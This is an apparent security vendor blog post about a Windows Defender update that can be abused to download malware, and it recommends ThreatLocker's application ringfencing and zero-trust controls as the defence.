Antivirus is the last thing you would expect to be compromised and weaponized against you for malicious purposes.
Ironically, a recent update to Windows Defender Antivirus put the solution on the list of applications and programs abused by cybercriminals. This update allows the solution to download malware and files to a Windows Computer.
You might also be surprised to find out that anyone running Windows 10 is running Windows Defender, regardless of whether or not you are using another Antivirus solution.
Even if Windows Defender has been disabled, the executables stay on your computer. Windows Defender also has a feature that allows you to download files from the internet. What this means is that you could potentially download malware.
If you are running ThreatLocker Application Whitelisting, it doesn’t matter if the file is coming from Windows Defender or not. ThreatLocker will block any file that is not trusted from executing.
A better scenario would be to stop the file from being downloaded from the internet in the first place. By using ThreatLocker, you can Ringfence all applications including antivirus software like Windows Defender.
We always recommend you Ringfence as many applications as possible and restrict them from accessing the internet if they do not need to.
For your convenience, ThreatLocker has created a policy to Ringfence Windows Defender out of the box as a suggested policy and we added it as a default configuration for any new customers or user groups.
With these policies in place, any file, malicious or not will be unable to download or execute if it is not permitted to do so.
Antivirus is often excluded from scanning by various other security tools. Security professionals must recognize that any application, including antivirus, can be vulnerable. Therefore, it is critical that you don’t exclude software like Windows Defender from being scanned for malicious behavior.
Ultimately, in order to effectively protect yourself from vulnerabilities like this, you must limit access. Do not allow applications to access the internet unless they need to.
By taking a zero-trust approach, you reduce your surface area of attack and in turn, this reduces your exposure to vulnerabilities.